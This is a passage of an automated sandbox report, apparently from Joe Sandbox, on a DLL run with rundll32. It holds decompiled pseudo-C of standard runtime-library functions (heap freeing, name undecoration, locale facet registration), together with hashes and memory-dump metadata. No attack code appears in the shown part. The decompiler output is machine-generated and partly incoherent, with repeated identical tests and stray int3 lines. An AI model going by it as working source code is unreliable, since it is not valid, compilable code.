_free.LIBCMT ref: 6E24D403

Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB

_free.LIBCMT ref: 6E24D40F
_free.LIBCMT ref: 6E24D41A
_free.LIBCMT ref: 6E24D425
_free.LIBCMT ref: 6E24D430
_free.LIBCMT ref: 6E24D43B
_free.LIBCMT ref: 6E24D446
_free.LIBCMT ref: 6E24D451
_free.LIBCMT ref: 6E24D45C
_free.LIBCMT ref: 6E24D46A

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b5c57d17f50339d7e7482d3a3b790ac603cd19325689644bcc7dc5f61ea148d3
Instruction ID: 9f7c4102c4263e28cf1bc5931b56c6b5732a8b74c25de712ae395a4058aaa141
Opcode Fuzzy Hash: b5c57d17f50339d7e7482d3a3b790ac603cd19325689644bcc7dc5f61ea148d3
Instruction Fuzzy Hash: E711FB7954420CFFDB05DF98C841DDE3BBAEF04654B2144A0F9098F122DB7ADE549B80

Uniqueness

Uniqueness Score: -1.00%

Function 6E2270E2, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E6E2270E2(void* __ecx, void* __edx, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char* _t18;
				unsigned int _t23;
				char* _t26;
				intOrPtr* _t29;
				intOrPtr* _t30;
				unsigned int _t33;
				char* _t36;
				signed int* _t38;
				void* _t41;
				intOrPtr _t47;
				intOrPtr _t50;

				_t18 =  *0x6e2c7218; // 0x0
				_t41 =  *_t18 - 0x58;
				if(_t41 == 0) {
					 *0x6e2c7218 = _t18 + 1;
					_push("void");
					goto L16;
				} else {
					if(_t41 == 0) {
						 *0x6e2c7218 = _t18 + 1;
						_t23 =  *0x6e2c7220; // 0x0
						_t26 = "...";
						if(( !(_t23 >> 0x12) & 0x00000001) == 0) {
							_t26 = "<ellipsis>";
						}
						_push(_t26);
						L16:
						E6E225A6C(_a4);
						goto L17;
					} else {
						E6E226FEC(__edx,  &_v12);
						_t50 = _v8;
						if(_t50 != 0) {
							L11:
							_t29 = _a4;
							 *_t29 = _v12;
							 *((intOrPtr*)(_t29 + 4)) = _t50;
							return _t29;
						} else {
							_t30 =  *0x6e2c7218; // 0x0
							_t47 =  *_t30;
							if(_t47 == 0) {
								goto L11;
							} else {
								if(_t47 == 0x40) {
									 *0x6e2c7218 = _t30 + 1;
									goto L11;
								} else {
									if(_t47 == 0x5a) {
										 *0x6e2c7218 = _t30 + 1;
										_t33 =  *0x6e2c7220; // 0x0
										_t36 = ",...";
										if(( !(_t33 >> 0x12) & 0x00000001) == 0) {
											_t36 = ",<ellipsis>";
										}
										E6E225EB7( &_v12, _a4, _t36);
										L17:
										return _a4;
									} else {
										_t38 = _a4;
										_t38[1] = _t38[1] & 0x00000000;
										 *_t38 =  *_t38 & 0x00000000;
										_t38[1] = 2;
										return _t38;
									}
								}
							}
						}
					}
				}
			}

0x6e2270e7
0x6e2270ef
0x6e2270f2
0x6e227195
0x6e22719a
0x00000000
0x6e2270f8
0x6e2270fc
0x6e227174
0x6e227179
0x6e227185
0x6e22718a
0x6e22718c
0x6e22718c
0x6e227191
0x6e22719f
0x6e2271a2
0x00000000
0x6e2270fe
0x6e227102
0x6e227107
0x6e22710d
0x6e227166
0x6e227166
0x6e22716c
0x6e22716e
0x6e227172
0x6e22710f
0x6e22710f
0x6e227114
0x6e227118
0x00000000
0x6e22711a
0x6e22711d
0x6e227161
0x00000000
0x6e22711f
0x6e227122
0x6e227135
0x6e22713a
0x6e227146
0x6e22714b
0x6e22714d
0x6e22714d
0x6e227159
0x6e2271a7
0x6e2271ab
0x6e227124
0x6e227124
0x6e227127
0x6e22712b
0x6e22712e
0x6e227133
0x6e227133
0x6e227122
0x6e22711d
0x6e227118
0x6e22710d
0x6e2270fc

APIs

UnDecorator::getArgumentList.LIBVCRUNTIME ref: 6E227102

Part of subcall function 6E226FEC: Replicator::operator[].LIBVCRUNTIME ref: 6E227058
Part of subcall function 6E226FEC: DName::operator+=.LIBVCRUNTIME ref: 6E227060

DName::operator+.LIBCMT ref: 6E227159
DName::DName.LIBVCRUNTIME ref: 6E2271A2

Strings

,<ellipsis>, xrefs: 6E22714D, 6E227152
,..., xrefs: 6E227146
..., xrefs: 6E227185
void, xrefs: 6E22719A
<ellipsis>, xrefs: 6E22718C, 6E227191

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: 610bee019bb478f271409b3d8826ef367bfc60c77d29fab54251367a64c668b2
Instruction ID: e36a2fff2aaca9da93800c7487182c7d0d0b7ae34ee3949ede7615e3ce7083e3
Opcode Fuzzy Hash: 610bee019bb478f271409b3d8826ef367bfc60c77d29fab54251367a64c668b2
Instruction Fuzzy Hash: 61219F7061460E9FDF84CFACC8A8BAA7BE6EF06755F084164E845CB291C770DA41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E20777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t50 =  *0x6e2c6c10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6E1E161C(0x6e2c6b2c);
				_t38 = _a8;
				_t20 = E6E1E171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E207E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6E1E1438(_t42);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6E206FD3(__eflags, _t48);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6e2c6c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E207786
std::_Lockit::_Lockit.LIBCPMT ref: 6E207790
int.LIBCPMT ref: 6E2077A7

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

codecvt.LIBCPMT ref: 6E2077CA
std::_Facet_Register.LIBCPMT ref: 6E2077E1
std::_Lockit::~_Lockit.LIBCPMT ref: 6E207801
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20781F

Strings

,k,n, xrefs: 6E20779B

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ,k,n
API String ID: 2594415655-471452842
Opcode ID: 3dfab4b70d6542cd1a2806a9ce26b487951b8c9b1d2862f78e078a0c6e12c66e
Instruction ID: 0179d36af2547f3a6f86643ce04adbca5e5398214e6b67d57264304a796339a0
Opcode Fuzzy Hash: 3dfab4b70d6542cd1a2806a9ce26b487951b8c9b1d2862f78e078a0c6e12c66e
Instruction Fuzzy Hash: B311E975A0061D9BCB01EBE4C844AEDB7BBBF44B14F100918E410AB3E0DFB4AA44C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20EEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20EEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t920 = __edx;
				_t699 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t990 - 0x14, 0);
				_t945 =  *0x6e2c6e04; // 0x0
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6E1E161C(0x6e2c6b30);
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6E2066BA(_t990 - 0x14);
					return E6E220075(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6E210C9D(__ebx, _t702, __edx, _t922, _t945) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t990 - 0x20);
							E6E223D74(_t990 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t922, _t945, 0x14);
							E6E206653(_t990 - 0x14, 0);
							_t946 =  *0x6e2c6de4; // 0x0
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6E1E161C(0x6e2c6d90);
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6E2066BA(_t990 - 0x14);
								return E6E220075(_t923);
							} else {
								__eflags = _t946;
								if(_t946 == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6E210D03(_t699, _t709, __edx, _t923, _t946) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t990 - 0x20);
										E6E223D74(_t990 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t699, _t923, _t946, 0x14);
										E6E206653(_t990 - 0x14, 0);
										_t947 =  *0x6e2c6db4; // 0x0
										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
										 *(_t990 - 0x10) = _t947;
										_t347 = E6E1E161C(0x6e2c6d68);
										_t716 =  *((intOrPtr*)(_t990 + 8));
										_t924 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t347);
										__eflags = _t924;
										if(_t924 != 0) {
											L19:
											E6E2066BA(_t990 - 0x14);
											return E6E220075(_t924);
										} else {
											__eflags = _t947;
											if(_t947 == 0) {
												_push( *((intOrPtr*)(_t990 + 8)));
												_push(_t990 - 0x10);
												__eflags = E6E210DA5(_t699, _t716, __edx, _t924, _t947) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t990 - 0x20);
													E6E223D74(_t990 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t699, _t924, _t947, 0x14);
													E6E206653(_t990 - 0x14, 0);
													_t948 =  *0x6e2c6dd4; // 0x0
													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
													 *(_t990 - 0x10) = _t948;
													_t360 = E6E1E161C(0x6e2c6b28);
													_t723 =  *((intOrPtr*)(_t990 + 8));
													_t925 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t360);
													__eflags = _t925;
													if(_t925 != 0) {
														L26:
														E6E2066BA(_t990 - 0x14);
														return E6E220075(_t925);
													} else {
														__eflags = _t948;
														if(_t948 == 0) {
															_push( *((intOrPtr*)(_t990 + 8)));
															_push(_t990 - 0x10);
															__eflags = E6E210E47(_t699, _t723, _t920, _t925, _t948) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t990 - 0x20);
																E6E223D74(_t990 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t699, _t925, _t948, 0x14);
																E6E206653(_t990 - 0x14, 0);
																_t949 =  *0x6e2c6de8; // 0x0
																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																 *(_t990 - 0x10) = _t949;
																_t373 = E6E1E161C(0x6e2c6d94);
																_t730 =  *((intOrPtr*)(_t990 + 8));
																_t926 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t373);
																__eflags = _t926;
																if(_t926 != 0) {
																	L33:
																	E6E2066BA(_t990 - 0x14);
																	return E6E220075(_t926);
																} else {
																	__eflags = _t949;
																	if(_t949 == 0) {
																		_push( *((intOrPtr*)(_t990 + 8)));
																		_push(_t990 - 0x10);
																		__eflags = E6E210EB7(_t699, _t730, _t920, _t926, _t949) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t990 - 0x20);
																			E6E223D74(_t990 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t699, _t926, _t949, 0x14);
																			E6E206653(_t990 - 0x14, 0);
																			_t950 =  *0x6e2c6db8; // 0x0
																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																			 *(_t990 - 0x10) = _t950;
																			_t386 = E6E1E161C(0x6e2c6d6c);
																			_t737 =  *((intOrPtr*)(_t990 + 8));
																			_t927 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t386);
																			__eflags = _t927;
																			if(_t927 != 0) {
																				L40:
																				E6E2066BA(_t990 - 0x14);
																				return E6E220075(_t927);
																			} else {
																				__eflags = _t950;
																				if(_t950 == 0) {
																					_push( *((intOrPtr*)(_t990 + 8)));
																					_push(_t990 - 0x10);
																					__eflags = E6E210F1F(_t699, _t737, _t920, _t927, _t950) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t990 - 0x20);
																						E6E223D74(_t990 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t699, _t927, _t950, 0x14);
																						E6E206653(_t990 - 0x14, 0);
																						_t951 =  *0x6e2c6dec; // 0x0
																						 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																						 *(_t990 - 0x10) = _t951;
																						_t399 = E6E1E161C(0x6e2c6d98);
																						_t744 =  *((intOrPtr*)(_t990 + 8));
																						_t928 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t399);
																						__eflags = _t928;
																						if(_t928 != 0) {
																							L47:
																							E6E2066BA(_t990 - 0x14);
																							return E6E220075(_t928);
																						} else {
																							__eflags = _t951;
																							if(_t951 == 0) {
																								_push( *((intOrPtr*)(_t990 + 8)));
																								_push(_t990 - 0x10);
																								__eflags = E6E210F87(_t699, _t744, _t920, _t928, _t951) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t990 - 0x20);
																									E6E223D74(_t990 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t699, _t928, _t951, 0x14);
																									E6E206653(_t990 - 0x14, 0);
																									_t952 =  *0x6e2c6dbc; // 0x0
																									 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																									 *(_t990 - 0x10) = _t952;
																									_t412 = E6E1E161C(0x6e2c6d70);
																									_t751 =  *((intOrPtr*)(_t990 + 8));
																									_t929 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t412);
																									__eflags = _t929;
																									if(_t929 != 0) {
																										L54:
																										E6E2066BA(_t990 - 0x14);
																										return E6E220075(_t929);
																									} else {
																										__eflags = _t952;
																										if(_t952 == 0) {
																											_push( *((intOrPtr*)(_t990 + 8)));
																											_push(_t990 - 0x10);
																											__eflags = E6E210FEF(_t699, _t751, _t920, _t929, _t952) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t990 - 0x20);
																												E6E223D74(_t990 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t699, _t929, _t952, 0x14);
																												E6E206653(_t990 - 0x14, 0);
																												_t953 =  *0x6e2c6df0; // 0x0
																												 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																												 *(_t990 - 0x10) = _t953;
																												_t425 = E6E1E161C(0x6e2c6d9c);
																												_t758 =  *((intOrPtr*)(_t990 + 8));
																												_t930 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t425);
																												__eflags = _t930;
																												if(_t930 != 0) {
																													L61:
																													E6E2066BA(_t990 - 0x14);
																													return E6E220075(_t930);
																												} else {
																													__eflags = _t953;
																													if(_t953 == 0) {
																														_push( *((intOrPtr*)(_t990 + 8)));
																														_push(_t990 - 0x10);
																														__eflags = E6E211057(_t699, _t758, _t920, _t930, _t953) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t990 - 0x20);
																															E6E223D74(_t990 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t699, _t930, _t953, 0x14);
																															E6E206653(_t990 - 0x14, 0);
																															_t954 =  *0x6e2c6dc0; // 0x0
																															 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																															 *(_t990 - 0x10) = _t954;
																															_t438 = E6E1E161C(0x6e2c6d74);
																															_t765 =  *((intOrPtr*)(_t990 + 8));
																															_t931 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t438);
																															__eflags = _t931;
																															if(_t931 != 0) {
																																L68:
																																E6E2066BA(_t990 - 0x14);
																																return E6E220075(_t931);
																															} else {
																																__eflags = _t954;
																																if(_t954 == 0) {
																																	_push( *((intOrPtr*)(_t990 + 8)));
																																	_push(_t990 - 0x10);
																																	__eflags = E6E2110BF(_t699, _t765, _t920, _t931, _t954) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t990 - 0x20);
																																		E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t699, _t931, _t954, 0x14);
																																		E6E206653(_t990 - 0x14, 0);
																																		_t955 =  *0x6e2c6df8; // 0x0
																																		 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																		 *(_t990 - 0x10) = _t955;
																																		_t451 = E6E1E161C(0x6e2c6da4);
																																		_t772 =  *((intOrPtr*)(_t990 + 8));
																																		_t932 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t451);
																																		__eflags = _t932;
																																		if(_t932 != 0) {
																																			L75:
																																			E6E2066BA(_t990 - 0x14);
																																			return E6E220075(_t932);
																																		} else {
																																			__eflags = _t955;
																																			if(_t955 == 0) {
																																				_push( *((intOrPtr*)(_t990 + 8)));
																																				_push(_t990 - 0x10);
																																				__eflags = E6E211127(_t699, _t772, _t920, _t932, _t955) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t990 - 0x20);
																																					E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t699, _t932, _t955, 0x14);
																																					E6E206653(_t990 - 0x14, 0);
																																					_t956 =  *0x6e2c6df4; // 0x0
																																					 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																					 *(_t990 - 0x10) = _t956;
																																					_t464 = E6E1E161C(0x6e2c6da0);
																																					_t779 =  *((intOrPtr*)(_t990 + 8));
																																					_t933 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t464);
																																					__eflags = _t933;
																																					if(_t933 != 0) {
																																						L82:
																																						E6E2066BA(_t990 - 0x14);
																																						return E6E220075(_t933);
																																					} else {
																																						__eflags = _t956;
																																						if(_t956 == 0) {
																																							_push( *((intOrPtr*)(_t990 + 8)));
																																							_push(_t990 - 0x10);
																																							__eflags = E6E2111AB(_t699, _t779, _t920, _t933, _t956) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t990 - 0x20);
																																								E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t699, _t933, _t956, 0x14);
																																								E6E206653(_t990 - 0x14, 0);
																																								_t957 =  *0x6e2c6dc8; // 0x0
																																								 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																								 *(_t990 - 0x10) = _t957;
																																								_t477 = E6E1E161C(0x6e2c6d7c);
																																								_t786 =  *((intOrPtr*)(_t990 + 8));
																																								_t934 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t477);
																																								__eflags = _t934;
																																								if(_t934 != 0) {
																																									L89:
																																									E6E2066BA(_t990 - 0x14);
																																									return E6E220075(_t934);
																																								} else {
																																									__eflags = _t957;
																																									if(_t957 == 0) {
																																										_push( *((intOrPtr*)(_t990 + 8)));
																																										_push(_t990 - 0x10);
																																										__eflags = E6E211230(_t699, _t786, _t920, _t934, _t957) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t990 - 0x20);
																																											E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t699, _t934, _t957, 0x14);
																																											E6E206653(_t990 - 0x14, 0);
																																											_t958 =  *0x6e2c6dc4; // 0x0
																																											 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																											 *(_t990 - 0x10) = _t958;
																																											_t490 = E6E1E161C(0x6e2c6d78);
																																											_t793 =  *((intOrPtr*)(_t990 + 8));
																																											_t935 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t490);
																																											__eflags = _t935;
																																											if(_t935 != 0) {
																																												L96:
																																												E6E2066BA(_t990 - 0x14);
																																												return E6E220075(_t935);
																																											} else {
																																												__eflags = _t958;
																																												if(_t958 == 0) {
																																													_push( *((intOrPtr*)(_t990 + 8)));
																																													_push(_t990 - 0x10);
																																													__eflags = E6E2112B4(_t699, _t793, _t920, _t935, _t958) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t990 - 0x20);
																																														E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t699, _t935, _t958, 0x14);
																																														E6E206653(_t990 - 0x14, 0);
																																														_t959 =  *0x6e2c6dd8; // 0x0
																																														 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																														 *(_t990 - 0x10) = _t959;
																																														_t503 = E6E1E161C(0x6e2c6d84);
																																														_t800 =  *((intOrPtr*)(_t990 + 8));
																																														_t936 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t503);
																																														__eflags = _t936;
																																														if(_t936 != 0) {
																																															L103:
																																															E6E2066BA(_t990 - 0x14);
																																															return E6E220075(_t936);
																																														} else {
																																															__eflags = _t959;
																																															if(_t959 == 0) {
																																																_push( *((intOrPtr*)(_t990 + 8)));
																																																_push(_t990 - 0x10);
																																																__eflags = E6E211339(_t699, _t800, _t920, _t936, _t959) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t990 - 0x20);
																																																	E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t699, _t936, _t959, 0x14);
																																																	E6E206653(_t990 - 0x14, 0);
																																																	_t960 =  *0x6e2c6db0; // 0x0
																																																	 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																	 *(_t990 - 0x10) = _t960;
																																																	_t516 = E6E1E161C(0x6e2c6d64);
																																																	_t807 =  *((intOrPtr*)(_t990 + 8));
																																																	_t937 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t516);
																																																	__eflags = _t937;
																																																	if(_t937 != 0) {
																																																		L110:
																																																		E6E2066BA(_t990 - 0x14);
																																																		return E6E220075(_t937);
																																																	} else {
																																																		__eflags = _t960;
																																																		if(_t960 == 0) {
																																																			_push( *((intOrPtr*)(_t990 + 8)));
																																																			_push(_t990 - 0x10);
																																																			__eflags = E6E2113A1(_t699, _t807, _t920, _t937, _t960) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t990 - 0x20);
																																																				E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t699, _t937, _t960, 0x14);
																																																				E6E206653(_t990 - 0x14, 0);
																																																				_t961 =  *0x6e2c6ddc; // 0x0
																																																				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																				 *(_t990 - 0x10) = _t961;
																																																				_t529 = E6E1E161C(0x6e2c6d88);
																																																				_t814 =  *((intOrPtr*)(_t990 + 8));
																																																				_t938 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t529);
																																																				__eflags = _t938;
																																																				if(_t938 != 0) {
																																																					L117:
																																																					E6E2066BA(_t990 - 0x14);
																																																					return E6E220075(_t938);
																																																				} else {
																																																					__eflags = _t961;
																																																					if(_t961 == 0) {
																																																						_push( *((intOrPtr*)(_t990 + 8)));
																																																						_push(_t990 - 0x10);
																																																						__eflags = E6E211409(_t699, _t814, _t920, _t938, _t961) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1E1438(_t990 - 0x20);
																																																							E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e2683cf, _t699, _t938, _t961, 0x14);
																																																							E6E206653(_t990 - 0x14, 0);
																																																							_t962 =  *0x6e2c6de0; // 0x0
																																																							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																							 *(_t990 - 0x10) = _t962;
																																																							_t542 = E6E1E161C(0x6e2c6d8c);
																																																							_t821 =  *((intOrPtr*)(_t990 + 8));
																																																							_t939 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t542);
																																																							__eflags = _t939;
																																																							if(_t939 != 0) {
																																																								L124:
																																																								E6E2066BA(_t990 - 0x14);
																																																								return E6E220075(_t939);
																																																							} else {
																																																								__eflags = _t962;
																																																								if(_t962 == 0) {
																																																									_push( *((intOrPtr*)(_t990 + 8)));
																																																									_push(_t990 - 0x10);
																																																									__eflags = E6E211471(_t699, _t821, _t920, _t939, _t962) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1E1438(_t990 - 0x20);
																																																										E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																										asm("int3");
																																																										E6E2200AC(0x6e2683cf, _t699, _t939, _t962, 0x14);
																																																										E6E206653(_t990 - 0x14, 0);
